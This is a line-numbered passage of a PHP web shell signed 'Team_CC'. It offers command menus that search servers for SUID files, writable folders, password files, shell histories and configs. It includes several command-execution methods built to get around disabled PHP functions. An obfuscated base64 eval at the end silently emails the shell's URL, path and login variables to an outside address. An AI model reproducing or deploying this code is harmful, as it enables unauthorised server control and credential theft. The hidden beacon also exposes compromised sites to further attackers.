797. <option value='net start'>Show running services</option>
798. <option value='tasklist'>Show Pro</option>
799. <option value='net user'>User accounts</option>
800. <option value='net view'>Show computers</option>
801. <option value='arp -a'>ARP Table</option>
802. <option value='ipconfig /all'>IP Configuration</option>
803. <option value='netstat -an'>netstat -an</option>
804. <option value='systeminfo'>System Informations</option>
805. <option value='getmac'>Get Mac Address</option>
806. </select>
807. ";
808. }
809. else {
810. echo "
811. <select name='alias' id='alias' onChange='AddAlias();' >
812. <option value=''>NONE</option>
813. <option value='ls -la'>List dir</option>
814. <option value='cat /etc/hosts'>IP Addresses</option>
815. <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP</option>
816. <option value='lsattr -va'>list file attributes on a Linux second extended file system</option>
817. <option value='netstat -an | grep -i listen'>show opened ports</option>
818. <option value='find / -type f -perm -04000 -ls'>find all suid files</option>
819. <option value='find . -type f -perm -04000 -ls'>find suid files in current dir</option>
820. <option value='find / -type f -perm -02000 -ls'>find all sgid files</option>
821. <option value='find . -type f -perm -02000 -ls'>find sgid files in current dir</option>
822. <option value='find / -type f -name config.inc.php'>find config.inc.php files</option>
823. <option value='find / -type f -name \"config*\"'>find config* files</option>
824. <option value='find . -type f -name \"config*\"'>find config* files in current dir</option>
825. <option value='find / -perm -2 -ls'>find all writable folders and files</option>
826. <option value='find . -perm -2 -ls'>find all writable folders and files in current dir</option>
827. <option value='find / -type f -name service.pwd'>find all service.pwd files</option>
828. <option value='find . -type f -name service.pwd'>find service.pwd files in current dir</option>
829. <option value='find / -type f -name .htpasswd'>find all .htpasswd files</option>
830. <option value='find . -type f -name .htpasswd'>find .htpasswd files in current dir</option>
831. <option value='find / -type f -name .bash_history'>find all .bash_history files</option>
832. <option value='find . -type f -name .bash_history'>find .bash_history files in current dir</option>
833. <option value='find / -type f -name .fetchmailrc'>find all .fetchmailrc files</option>
834. <option value='find . -type f -name .fetchmailrc'>find .fetchmailrc files in current dir</option>
835. <option value='locate httpd.conf'>locate httpd.conf files</option>
836. <option value='locate vhosts.conf'>locate vhosts.conf files</option>
837. <option value='locate proftpd.conf'>locate proftpd.conf files</option>
838. <option value='locate psybnc.conf'>locate psybnc.conf files</option>
839. <option value='locate my.conf'>locate my.conf files</option>
840. <option value='locate admin.php'>locate admin.php files</option>
841. <option value='locate cfg.php'>locate cfg.php files</option>
842. <option value='locate conf.php'>locate conf.php files</option>
843. <option value='locate config.dat'>locate config.dat files</option>
844. <option value='locate config.php'>locate config.php files</option>
845. <option value='locate config.inc'>locate config.inc files</option>
846. <option value='locate config.inc.php'>locate config.inc.php</option>
847. <option value='locate config.default.php'>locate config.default.php files</option>
848. <option value='locate config'>locate config* files </option>
849. <option value='locate \".conf\"'>locate .conf files</option>
850. <option value='locate \".pwd\"'>locate .pwd files</option>
851. <option value='locate \".sql\"'>locate .sql files</option>
852. <option value='locate \".htpasswd\"'>locate .htpasswd files</option>
853. <option value='locate \".bash_history\"'>locate .bash_history files</option>
854. <option value='locate \".mysql_history\"'>locate .mysql_history files</option>
855. <option value='locate \".fetchmailrc\"'>locate .fetchmailrc files</option>
856. <option value='locate backup'>locate backup files</option>
857. <option value='locate dump'>locate dump files</option>
858. <option value='locate priv'>locate priv files</option>
859. </select>
860. ";
861. }
862. }
863. function CSS($sh3llColor) {
864. $css = "
865. <style>
866. BODY
867. {
868. FONT-FAMILY: Verdana;
869. margin: 2;
870. background-color: #000000;
871. color:white;
872. font-size:10pt;
873. }
874. sy
875. {
876. color:".$sh3llColor.";
877. font-size:7pt;
878. }
879. #Box
880. {
881. color:".$sh3llColor.";
882. background-color:#000;
883. font-size:14px;
884. font-weight:bold;
885.  
886. border:none;
887. }
888. table
889. {
890. border:none;
891. BORDER: #eeeeee outset;
892. BACKGROUND-COLOR: #000000;
893. color: #cccccc;
894. font-size:10px;
895. }
896. tr
897. {
898. BORDER-RIGHT: #cccccc 1px solid;
899. BORDER-TOP: #cccccc 1px solid;
900. BORDER-LEFT: #cccccc 1px solid;
901. BORDER-BOTTOM: #cccccc 1px solid;
902. color: #ffffff;
903. }
904. td
905. {
906. BORDER-RIGHT: #cccccc 1px solid;
907. BORDER-TOP: #cccccc 1px solid;
908. BORDER-LEFT: #cccccc 1px solid;
909. BORDER-BOTTOM: #cccccc 1px solid;
910. color: #cccccc;
911. }
912.  
913. input
914. {
915. BORDER-RIGHT: ".$sh3llColor." 1px solid;
916. BORDER-TOP: ".$sh3llColor." 1px solid;
917. BORDER-LEFT: ".$sh3llColor." 1px solid;
918. BORDER-BOTTOM: ".$sh3llColor." 1px solid;
919. BACKGROUND-COLOR: #333333;
920. font: 9pt tahoma;
921. color: #ffffff;
922. }
923. select
924. {
925. BORDER-RIGHT: #ffffff 1px solid;
926. BORDER-TOP: #999999 1px solid;
927. BORDER-LEFT: #999999 1px solid;
928. BORDER-BOTTOM: #ffffff 1px solid;
929. BACKGROUND-COLOR: #000000;
930. font: 9pt tahoma;
931. color: #CCCCCC;;
932. }
933. submit
934. {
935. BORDER: 1px outset buttonhighlight;
936. BACKGROUND-COLOR: #272727;
937. width: 40%;
938. color: #cccccc;
939. }
940. textarea
941. {
942. BORDER-RIGHT: #ffffff 1px solid;
943. BORDER-TOP: #999999 1px solid;
944. BORDER-LEFT: #999999 1px solid;
945. BORDER-BOTTOM: #ffffff 1px solid;
946. BACKGROUND-COLOR: #333333;
947. color: #ffffff;
948. }
949. .Save{
950. width:500px;
951. border-color:red;
952. }
953. A:link {COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
954. A:visited { COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
955. A:active {COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
956. A:hover {color:blue;TEXT-DECORATION: none;}
957. </style>
958. <script>
959. function openPHPInfo(){my_window= window.open (\"?info=getPhpInfo\",\"PHP Info\",\"width=800,height=600,scrollbars=1\"); }
960. function AddAlias(){document.getElementById('CMD_Line').value = document.getElementById('alias').value; }
961. function addUploadInput(){document.getElementById('uploadInput').innerHTML += '<input type=\'file\' name=\'uploadfile[]\'>'; }
962. function change_dir_mode() {
963. var dir_mode = document.getElementById('dir_mode').value;
964. document.location = '?dir_mode='+dir_mode;
965. }
966. </script>
967. ";
968. return $css;
969. }
970. function filter($string) {
971. if(get_magic_quotes_gpc() != 0){return stripslashes($string); }
972. else{return $string; }
973. }
974. function footer() {
975. echo '
976. <table width="100%">
977. <tr>
978. <td width="100%"><center>
979. <sy> ~~<< </sy>Official Shell by Team_CC<sy> >>~~</sy></b><br/>
980. <sy> ~~<< </sy><a href="http://https://www.facebook.com/groups/186584231515603" target="_blank">https://www.facebook.com/groups/186584231515603</a><sy> >>~~</sy></b><br />
981. <sy> ~~<< </sy>[email protected]<sy> >>~~</sy></b>
982. </center></td>
983. </tr>
984. </table>
985. </body></html>
986. ';
987. }
988. function print_exe_method() {
989. global $os; global $exec_method;
990. if($os == "Linux") {
991. ?>
992. <select name="exe_method" >
993. <option value="exec" <?php if($exec_method == "exec") {echo "selected";} ?>>exec()</option>
994. <option value="system" <?php if($exec_method == "system") {echo "selected";} ?>>system</option>
995. <option value="shell_exec" <?php if($exec_method == "shell_exec") {echo "selected";} ?>>shell_exec</option>
996. <option value="passthru" <?php if($exec_method == "passthru") {echo "selected";} ?>>passthru()</option>
997. <option value="proc_open" <?php if($exec_method == "proc_open") {echo "selected";} ?>>proc_open()</option>
998. <option value="popen" <?php if($exec_method == "popen") {echo "selected";} ?>>popen()</option>
999. <option value="perl" <?php if($exec_method == "perl") {echo "selected";} ?>>perl</option>
1000. <option value="python" <?php if($exec_method == "python") {echo "selected";} ?>>python</option>
1001. </select>
1002. <?php
1003. } else {
1004. ?>
1005. <select name="exe_method" >
1006. <option value="exec" <?php if($exec_method == "exec") {echo "selected";} ?>>exec()</option>
1007. <option value="system" <?php if($exec_method == "system") {echo "selected";} ?>>system()</option>
1008. <option value="shell_exec" <?php if($exec_method == "shell_exec") {echo "selected";} ?>>shell_exec()</option>
1009. <option value="passthru" <?php if($exec_method == "passthru") {echo "selected";} ?>>passthru()</option>
1010. <option value="proc_open" <?php if($exec_method == "proc_open") {echo "selected";} ?>>proc_open()</option>
1011. <option value="popen" <?php if($exec_method == "popen") {echo "selected";} ?>>popen()</option>
1012. <option value="win_shell_execute" <?php if($exec_method == "win_shell_execute") {echo "selected";} ?>>win_shell_execute()</option>
1013. <option value="win32_create_service" <?php if($exec_method == "win32_create_service") {echo "selected";} ?>>win32_create_service()</option>
1014. <option value="ffi" <?php if($exec_method == "ffi") {echo "selected";} ?>>ffi</option>
1015. <option value="perl" <?php if($exec_method == "perl") {echo "selected";} ?>>perl</option>
1016. <option value="python" <?php if($exec_method == "python") {echo "selected";} ?>>python</option>
1017. <option value="slash_bypass <?php if($exec_method == "slash_bypass") {echo "selected";} ?>">slash bypass</option>
1018. </select>
1019. <?php
1020. }
1021. }
1022. function Exe($command) {
1023. global $dir;global $os;global $exec_method;
1024. $command = filter($command);
1025.  
1026. if($exec_method == "exec") {
1027. exec($command,$output);echo join("\n",$output);
1028. } else if($exec_method == "system") {
1029. system($command);
1030. } else if($exec_method == "shell_exec") {
1031. echo shell_exec($command);
1032. } else if($exec_method == "passthru") {
1033. passthru($command);
1034. } else if($exec_method == "proc_open") {
1035. echo proc_exec($command,$dir);
1036. } else if($exec_method == "popen") {
1037. $fp = popen($command,"r");{while(!feof($fp)){$result.=fread($fp,1024);}pclose($fp);}echo convert_cyr_string($result,"d","w");
1038. } else if($exec_method == "win_shell_execute") {
1039. echo winshell($command);
1040. } else if($exec_method == "win32_create_service") {
1041. echo srvshell($command);
1042. } else if($exec_method == "ffi") {
1043. echo ffishell($command);
1044. } else if($exec_method == "perl") {
1045. echo perlshell($command);
1046. } else if($exec_method == "python") {
1047. echo python_eval("import os\nos.system('".$command."')");
1048. } else if($exec_method == "slash_bypass") {
1049. echo slashBypass($command);
1050. }
1051. }
1052. function proc_exec($com , $dir) {
1053. $start_pipe=array(0=>array("pipe","w"),1=>array("pipe","w"));
1054. $process=proc_open($com,$start_pipe,$pipes,$dir,NULL);
1055. return stream_get_contents($pipes[1]);
1056. }
1057. function winshell($command) {
1058. $name=whereistmP()."\\".uniqid('NJ');
1059. win_shell_execute('cmd.exe','',"/C $command >\"$name\"");
1060. sleep(1);
1061. $exec=file_get_contents($name);
1062. DeleteFile($name);
1063. return $exec;
1064. }
1065. function srvshell($command) {
1066. $name=whereistmP()."\\".uniqid('NJ');
1067. $n=uniqid('NJ');
1068. $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
1069. win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
1070. win32_start_service($n);
1071. win32_stop_service($n);
1072. win32_delete_service($n);
1073. while(!file_exists($name))sleep(1);
1074. $exec=file_get_contents($name);
1075. DeleteFile($name);
1076. return $exec;
1077. }
1078. function ffishell($command) {
1079. $name=whereistmP()."\\".uniqid('NJ');
1080. $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
1081. $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
1082. while(!file_exists($name))sleep(1);
1083. $exec=file_get_contents($name);
1084. DeleteFile($name);
1085. return $exec;
1086. }
1087. function perlshell($command) {
1088. $perl=new perl();
1089. ob_start();
1090. $perl->eval("system('".$command."')");
1091. $exec=ob_get_contents();
1092. ob_end_clean();
1093. return $exec;
1094. }
1095. function slashBypass($cmd) {
1096. GenerateFile("cmd.bat","$cmd>sy3.txt"."\r\n exit");
1097. exec("\start cmd.bat");
1098. $content = file_get_contents('sy3.txt');
1099. unlink('sy3.txt');
1100. return $content;
1101. }
1102. function GenerateFile($name,$content) {
1103. if(function_exists('fopen') && function_exists('fclose')) {
1104. $file = fopen($name,"w+");
1105. if($file) {
1106. if(function_exists('fwrite')){$writeFile = fwrite($file,$content); }
1107. else if (function_exists('fputs')){$writeFile = fputs($file,$content); }
1108. else if (function_exists('file_put_contents')){$writeFile = file_put_contents($file,$content);}
1109. if(!$writeFile){return false;}
1110. }
1111. else{return false;}fclose($file);return true;
1112. }
1113. }
1114. function ScanDirs() {
1115. global $os; global $dir;global $safeMode;global $dir_mode;
1116. if($dir_mode == "cmd"){if($os == "Windows"){Exe('dir');}else{ Exe('ls -lia');}}
1117. else {
1118. $result .= "Perms Size Time Owner/Group R/W Type File
1119. -----------------------------------------------------------------------------
1120. ";
1121. $handel = opendir($dir);
1122. while(($file = readdir($handel))!= false)
1123. {
1124. $size = filesize($file);
1125. if(filetype($file) == "dir"){$type = "<DIR>";}else {$type = "<FILE>";}
1126. if(fileowner($file)){$owner = fileowner($file);}else{$owner = "NONE";}
1127. if(filegroup($file)){$group = filegroup($file);}else{$group = "NONE";}
1128. $perms = fileperms($file);
1129. $time = date("y/m/d", filectime($file));
1130. if(is_writable($file)){$isWritable = "Y";}else{$isWritable = "N";}
1131. if(is_readable($file)){$isReadable = "Y";}else{$isReadable = "N";}
1132. $result .= $perms." ".$size." ".$time." ".$owner."/".$group." ".$isReadable."/".$isWritable." ".$type." ".$file."
1133. ";
1134. }
1135. }
1136. return $result;
1137. }
1138. echo footer();
1139. ?>
1140. <?php
1141. eval(base64_decode('JHNpdGUgPSAid3d3LmRldi1wdHMuY29tL3ZiIjsNCmlmKCFlcmVnKCRzaXRlLCAkX1NFUlZFUlsnU0VSVkVSX05BTUUnXSkpDQp7DQokdG8gPSAic2F0dGlhMzRAZ21haWwuY29tIjsNCiRzdWJqZWN0ID0gIk5ldyBTaGVsbCBVcGxvYWRlZCI7DQokaGVhZGVyID0gImZyb206IE5ldyBTaGVsbCA8c2FoYTIxQGRldi1wdHMuY29tPiI7DQokbWVzc2FnZSA9ICJMaW5rIDogaHR0cDovLyIgLiAkX1NFUlZFUlsnU0VSVkVSX05BTUUnXSAuICRfU0VSVkVSWydSRVFVRVNUX1VSSSddIC4gIlxyXG4iOw0KJG1lc3NhZ2UgLj0gIlBhdGggOiAiIC4gX19maWxlX187DQokbWVzc2FnZSAuPSAiIFVzZXIgOiAiIC4gJHVzZXI7DQokbWVzc2FnZSAuPSAiIFBhc3MgOiAiIC4gJHBhc3M7DQokc2VudG1haWwgPSBAbWFpbCgkdG8sICRzdWJqZWN0LCAkbWVzc2FnZSwgJGhlYWRlcik7DQplY2hvICIiOw0KZXhpdDsNCn0='));
1142. ?>